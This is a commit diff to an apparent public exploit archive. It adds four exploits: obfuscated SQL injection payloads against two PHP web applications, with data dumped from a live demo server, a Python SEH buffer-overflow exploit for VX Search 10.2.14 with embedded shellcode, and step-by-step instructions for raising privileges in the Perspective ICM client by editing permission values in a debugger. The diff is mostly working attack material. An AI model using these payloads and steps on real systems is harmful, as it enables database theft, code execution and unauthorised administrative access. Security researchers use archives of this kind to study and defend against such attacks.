DB: 2017-12-06

4 changes to exploits/shellcodes Microsoft Internet Explorer 6 - Aurora Microsoft Internet Explorer 6 - 'Aurora' Memory Corruption (MS10-002) VX Search 10.2.14 - 'command_name' Buffer Overflow Perspective ICM Investigation & Case 5.1.1.16 - Privilege Escalation Techno Portfolio Management Panel - 'id' SQL Injection Readymade Classifieds Script 1.0 - SQL Injection
2017-12-06 05:02:21 +00:00 · 2017-12-06 05:02:21 +00:00 · 5e7ce1be28
commit 5e7ce1be28
parent 5c6fd52e87
5 changed files with 252 additions and 1 deletions
--- a/exploits/php/webapps/43211.txt
+++ b/exploits/php/webapps/43211.txt
@ -0,0 +1,43 @@
+# # # # # 
+# Exploit Title: Techno - Portfolio Management Panel 1.0 - SQL Injection
+# Dork: N/A
+# Date: 02.12.2017
+# Vendor Homepage: https://codecanyon.net/user/engtechno
+# Software Link: https://codecanyon.net/item/techno-portfolio-management-panel/20919551
+# Demo: http://dacy.esy.es/eng/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/single.php?id=[SQL]
+# 
+# -14++/*!08888UNION*/(/*!08888SELECT*/0x283129,0x283229,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),0x283429,0x283529,0x283629,0x283729,(/*!08888SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!08888FROM*/+INFORMATION_SCHEMA.TABLES+/*!08888WHERE*/+TABLE_SCHEMA=DATABASE()),0x283929,0x28313029,0x28313129,0x28313229,0x28313329)--+-
+# 
+# Etc..
+# # # # #
+
+
+
+http://server/single.php?id=-14++/*!08888UNION*/(/*!08888SELECT*/0x283129,0x283229,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),0x283429,0x283529,0x283629,0x283729,(/*!08888SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!08888FROM*/+INFORMATION_SCHEMA.TABLES+/*!08888WHERE*/+TABLE_SCHEMA=DATABASE()),0x283929,0x28313029,0x28313129,0x28313229,0x28313329)--+-
+
+u633631124_dacy@server : u633631124_dacy : 10.1.24-MariaDB
+
+(7)categories
+feedback
+messages
+notes
+portfolio
+settings
+uploads
+users
+wp_commentmeta
+wp_comments
+etc....
--- a/exploits/php/webapps/43212.txt
+++ b/exploits/php/webapps/43212.txt
@ -0,0 +1,62 @@
+# # # # # 
+# Exploit Title: Readymade Classifieds Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 02.12.2017
+# Vendor Homepage: http://www.scubez.net/
+# Software Link: http://www.posty.in/index.html
+# Demo: http://www.posty.in/readymade-classifieds-demo.html
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# 
+# http://localhost/[PATH]/listings.php?catid=[SQL]
+# 
+# -1++/*!08888UNION*/((/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)))--+-
+# 
+# Parameter: catid (GET)
+#     Type: boolean-based blind
+#     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+#     Payload: catid=-7326' OR 9205=9205#
+# 
+#     Type: AND/OR time-based blind
+#     Title: MySQL >= 5.0.12 AND time-based blind
+#     Payload: catid=' AND SLEEP(5)-- tCbs
+# 	
+# 2)
+# 
+# http://localhost/[PATH]/ads-details.php?ID=[SQL]
+# 
+# -265++/*!08888UNION*/(/*!08888SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26))--+-
+# 
+# Parameter: ID (GET)
+#     Type: boolean-based blind
+#     Title: AND boolean-based blind - WHERE or HAVING clause
+#     Payload: ID=265 AND 4157=4157
+# 
+#     Type: AND/OR time-based blind
+#     Title: MySQL >= 5.0.12 AND time-based blind
+#     Payload: ID=265 AND SLEEP(5)
+# 
+#     Type: UNION query
+#     Title: Generic UNION query (NULL) - 26 columns
+#     Payload: ID=-5939 UNION ALL SELECT NULL,NULL,CONCAT(0x716a626271,0x664f68565771437a5444554e794f547462774e65574f43616b767945464c416d524b646f48675a67,0x71787a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ZIaY
+# 
+# Etc..
+# # # # #
+
+ 
+
+
+http://server/listings.php?catid=-1++/*!08888UNION*/((/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)))--+-
+
+http://server/ads-details.php?ID=-265++/*!08888UNION*/(/*!08888SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26))--+-
--- a/exploits/windows/remote/43209.py
+++ b/exploits/windows/remote/43209.py
@ -0,0 +1,67 @@
+#!/usr/bin/python
+
+
+print "*** VX Search Enterprise v10.2.14 Buffer Overflow (SEH) ***\n"
+
+# Exploit Title     : VX Search Enterprise v10.2.14 Buffer Overflow (SEH)
+# Discovery by      : W01fier00t
+# Twitter           : @wolfieroot
+# Discovery Date    : 22/11/2017
+# Software Link     : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe
+# Tested Version    : 10.2.14
+# Tested on OS      : Windows 7 Home Edition sp1
+# You will need to enable web server for this to work.
+# You will also need the Login to VX Search wepage, for this to work.
+
+import urllib
+import urllib2
+import socket
+
+#Bad chars \x00\x0a\x0d
+#Payload size: 351 bytes
+shellcode = (
+"\xdd\xc6\xb8\x4a\xec\xd2\xea\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
+"\x52\x83\xc5\x04\x31\x45\x13\x03\x0f\xff\x30\x1f\x73\x17\x36"
+"\xe0\x8b\xe8\x57\x68\x6e\xd9\x57\x0e\xfb\x4a\x68\x44\xa9\x66"
+"\x03\x08\x59\xfc\x61\x85\x6e\xb5\xcc\xf3\x41\x46\x7c\xc7\xc0"
+"\xc4\x7f\x14\x22\xf4\x4f\x69\x23\x31\xad\x80\x71\xea\xb9\x37"
+"\x65\x9f\xf4\x8b\x0e\xd3\x19\x8c\xf3\xa4\x18\xbd\xa2\xbf\x42"
+"\x1d\x45\x13\xff\x14\x5d\x70\x3a\xee\xd6\x42\xb0\xf1\x3e\x9b"
+"\x39\x5d\x7f\x13\xc8\x9f\xb8\x94\x33\xea\xb0\xe6\xce\xed\x07"
+"\x94\x14\x7b\x93\x3e\xde\xdb\x7f\xbe\x33\xbd\xf4\xcc\xf8\xc9"
+"\x52\xd1\xff\x1e\xe9\xed\x74\xa1\x3d\x64\xce\x86\x99\x2c\x94"
+"\xa7\xb8\x88\x7b\xd7\xda\x72\x23\x7d\x91\x9f\x30\x0c\xf8\xf7"
+"\xf5\x3d\x02\x08\x92\x36\x71\x3a\x3d\xed\x1d\x76\xb6\x2b\xda"
+"\x79\xed\x8c\x74\x84\x0e\xed\x5d\x43\x5a\xbd\xf5\x62\xe3\x56"
+"\x05\x8a\x36\xf8\x55\x24\xe9\xb9\x05\x84\x59\x52\x4f\x0b\x85"
+"\x42\x70\xc1\xae\xe9\x8b\x82\x10\x45\x93\x4a\xf9\x94\x93\x74"
+"\x98\x11\x75\xe2\x4a\x74\x2e\x9b\xf3\xdd\xa4\x3a\xfb\xcb\xc1"
+"\x7d\x77\xf8\x36\x33\x70\x75\x24\xa4\x70\xc0\x16\x63\x8e\xfe"
+"\x3e\xef\x1d\x65\xbe\x66\x3e\x32\xe9\x2f\xf0\x4b\x7f\xc2\xab"
+"\xe5\x9d\x1f\x2d\xcd\x25\xc4\x8e\xd0\xa4\x89\xab\xf6\xb6\x57"
+"\x33\xb3\xe2\x07\x62\x6d\x5c\xee\xdc\xdf\x36\xb8\xb3\x89\xde"
+"\x3d\xf8\x09\x98\x41\xd5\xff\x44\xf3\x80\xb9\x7b\x3c\x45\x4e"
+"\x04\x20\xf5\xb1\xdf\xe0\x05\xf8\x7d\x40\x8e\xa5\x14\xd0\xd3"
+"\x55\xc3\x17\xea\xd5\xe1\xe7\x09\xc5\x80\xe2\x56\x41\x79\x9f"
+"\xc7\x24\x7d\x0c\xe7\x6c")
+
+#0x1001a136 : pop edi # pop esi # ret 0x04 |  {PAGE_EXECUTE_READ} [libspp.dll]
+cmdname = "\x90" *16
+cmdname += shellcode
+cmdname += "A" * 157
+cmdname += "\xEB\x06"
+cmdname += "B" *2
+cmdname += "\x36\xa1\x01\x10"
+
+print " [*] Sending payload!..."
+url = 'http://127.0.0.1/add_command?sid=f3fdf2603e9ac8f518db9452fee62110'
+values = {'command_name' : cmdname}
+data = urllib.urlencode(values)
+req = urllib2.Request(url, data)
+
+try:
+	response = urllib2.urlopen(req, timeout = 1)
+except socket.timeout:
+	pass
+
+print " [*] DONE! :D\n"
--- a/exploits/windows/webapps/43210.txt
+++ b/exploits/windows/webapps/43210.txt
@ -0,0 +1,75 @@
+# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ## # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
+#  Exploit Title: Privilege Escalation - Perspective ICM Investigation & Case - 5.1.1.16
+#  Date Reported to vendor: Jun 28, 2017 
+#  Date Accepted by vendor: Jun 11, 2017
+#  Exploit Author: Konstantinos.alexiou@hotmail.com
+#  Vendor Homepage: www.resolver.com
+#  Version: Perspective ICM Investigation & Case - 5.1.1.16 
+#  Tested on: Windows 8.1
+#  CVE: CVE-2017-11319
+#  CVSS v2 Vector: (AV:A/AC:L/Au:S/C:C/I:C/A:P) 
+#  CVSS v2 Score: 7.4
+# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
+According to Resolver site: CIS  "investigations and case management software is an end-to-end, total solution for responding to, reporting on, 
+and investigating incidents"  
+====================================================Vulnerability description=============================================================
+The CIS application permits tampering of users’ permission values which are loaded through the following methods inside the Perspective.data.dll 
+just after the initial authentication phase and before the graphical users’ interface is loaded:
+ - accessLevels()
+ - userEntityPrivs()
+ - userFieldPrivs()
+The CIS thick client uses the aforementioned methods to set the users’ graphical interface, their permissions access level as well privilege access against 
+each GUI field which is retrieved from the database server just  after the initial login phase. Due to insufficient validation methods and missing cross server 
+side checking mechanisms, unprivileged authenticated users are allowed to modify their access level permissions by tampering and modifying these values 
+thus gaining access to priveleged users actions. An unprivileged user is able by using a C# disassembling and debugging tool such as “dnspy”  to tamper 
+these values and gain access on hidden and restricted privileged fields or enable hidden forms such as the “Administration” currently accessible only to the
+“CIS Administrators” group. 
+======================================================== Proof of Concept ==============================================================
+
+1. Connect to the URL and click on the main button to initiate the installation of the ClickOnce CIS application. 
+The CIS application starts downloading various required files which are automatically saved under the following folder:
+C:\Users\{Current Logged in User}\AppData\Local\Apps\2.0
+
+2.When the download is finished the main executable “Perspective.exe” is initialized and loaded by the dfsvc.exe which is responsible to check if the application 
+is already installed and up to date. 
+
+3. Close the application and open a disassembling and debugging tool such as dnspy. Use the menu “debugger” and choose the option “Debug an assembly”. 
+This will open a dialog box to choose an executable for debugging.
+Navigate to the main executable “Perspective.exe” which is installed inside the following directory and press OK:
+“C:\Users\{Current Logged in User}\AppData\Local\Apps\2.0\Data\{name}.WRL\{name}.AOQ\ pers..tive_f50e2c1eb6078f5b_0005.0001_c760ec4c4b1ffe6d\
+The debugger will stop at the main Entry Point of the application. 
+
+4. Click “Continue” from the main menu of the application until the login form appears on the screen. 
+
+5. When the login screen appears, navigate to the “DataHandle” class which is defined inside the “Prespective.data.dll” and should be already decompiled by the dnSpy.
+
+6. Insert breakpoints at the following functions inside the DataHandle Class:
+ - UserEntityPrivs
+ - UserFieldPrivs
+ - UserReportPrivs
+
+7. Login to the application with an unprivileged account and then click Continue from the main menu of the dnSpy. The debugger will stop on the first breakpoint at line 
+of the function UserEntityPrivs(). The “foreach” loop used inside these lines calls the UserEntityPrivs() function and sets the users’ allowed permissions against visible 
+screens and forms. Click on the Locals field at the bottom menu of the dnSpy and navigate to the entity “useEntityPrivs()” section.
+It should be mentioned that the “Administration” menu is restricted only for members belonging to “CIS Administrator” role while the user ITSECAS1 has no access on it.
+
+8. To enable just the administration menu for an unprivileged user just press Continue until the EntityID “Administration” appears in the Locals screen of the dnSpy and 
+change the following values to true: 
+  - AllowAdd 
+  - AllowDelete 
+  - AllowEdit 
+  - AllowExecute 
+  - AllowFullControl 
+  - AllowMange 
+  - AllowReadOnly 
+  - AllowShare
+  - Visible
+
+9. Delete the breakpoints and press Continue until the main screen of the thick client appears on the screen. 
+While the user is assigned as “Global Head” the administration menu accessible only to the admin users appears on his screen. 
+This modification provide access rights to change the minimum Password length to 6 characters 
+Additionally, using the aforementioned technique it is possible to enable additional restricted and none visible screens for any unauthorized user. 
+It should be also be mentioned that using the same technique it was possible to change the users’ report privileges inside the last “foreach” loop.
+
+10. Finally, and just after the UserReportPrivs foreach loop finishes, we can modify the users’ global membership permissions before they are applied to his interface. 
+Finally it should be mentioned that it is possible to access any submenu on the administration menu and modify values with only exception to create a new user.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10786,7 +10786,7 @@ id,file,description,date,author,type,platform,port
 11059,exploits/windows/remote/11059.html,"JcomBand toolbar on IE - ActiveX Buffer Overflow",2010-01-07,"germaya_x & D3V!L FUCKER",remote,windows,
 11138,exploits/windows/remote/11138.c,"Apple iTunes 8.1.x - 'daap' Remote Buffer Overflow",2010-01-14,Simo36,remote,windows,
 11151,exploits/windows/remote/11151.html,"Microsoft Internet Explorer - 'wshom.ocx' ActiveX Control Remote Code Execution",2010-01-16,"germaya_x & D3V!L FUCKER",remote,windows,
-11167,exploits/windows/remote/11167.py,"Microsoft Internet Explorer 6 - Aurora",2010-01-17,"Ahmed Obied",remote,windows,
+11167,exploits/windows/remote/11167.py,"Microsoft Internet Explorer 6 - 'Aurora' Memory Corruption (MS10-002)",2010-01-17,"Ahmed Obied",remote,windows,
 11172,exploits/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution (PoC)",2010-01-17,superli,remote,windows,
 11173,exploits/windows/remote/11173.txt,"Trend Micro Web-Deployment - ActiveX Remote Execution (PoC)",2010-01-17,superli,remote,windows,
 11179,exploits/windows/remote/11179.rb,"EFS Software Easy Chat Server 2.2 - Remote Buffer Overflow",2010-01-18,"John Babio",remote,windows,
@ -15996,6 +15996,7 @@ id,file,description,date,author,type,platform,port
 43195,exploits/windows/remote/43195.py,"HP iMC Plat 7.2 - Remote Code Execution",2017-11-28,"Chris Lyne",remote,windows,
 43193,exploits/unix/remote/43193.rb,"pfSense - Authenticated Group Member Remote Command Execution (Metasploit)",2017-11-29,Metasploit,remote,unix,443
 43198,exploits/windows/remote/43198.py,"HP iMC Plat 7.2 - Remote Code Execution (2)",2017-11-29,"Chris Lyne",remote,windows,
+43209,exploits/windows/remote/43209.py,"VX Search 10.2.14 - 'command_name' Buffer Overflow",2017-12-05,W01fier00t,remote,windows,80
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -38241,3 +38242,6 @@ id,file,description,date,author,type,platform,port
 43203,exploits/php/webapps/43203.txt,"Jobs2Careers / Coroflot Clone - SQL Injection",2017-11-30,8bitsec,webapps,php,
 43205,exploits/multiple/webapps/43205.txt,"MistServer 2.12 - Cross-Site Scripting",2017-12-01,hyp3rlinx,webapps,multiple,
 43206,exploits/php/webapps/43206.txt,"Artica Web Proxy 3.06 - Remote Code Execution",2017-12-01,hyp3rlinx,webapps,php,
+43210,exploits/windows/webapps/43210.txt,"Perspective ICM Investigation & Case 5.1.1.16 - Privilege Escalation",2017-12-05,"Konstantinos Alexiou",webapps,windows,
+43211,exploits/php/webapps/43211.txt,"Techno Portfolio Management Panel - 'id' SQL Injection",2017-12-05,"Ihsan Sencan",webapps,php,
+43212,exploits/php/webapps/43212.txt,"Readymade Classifieds Script 1.0 - SQL Injection",2017-12-05,"Ihsan Sencan",webapps,php,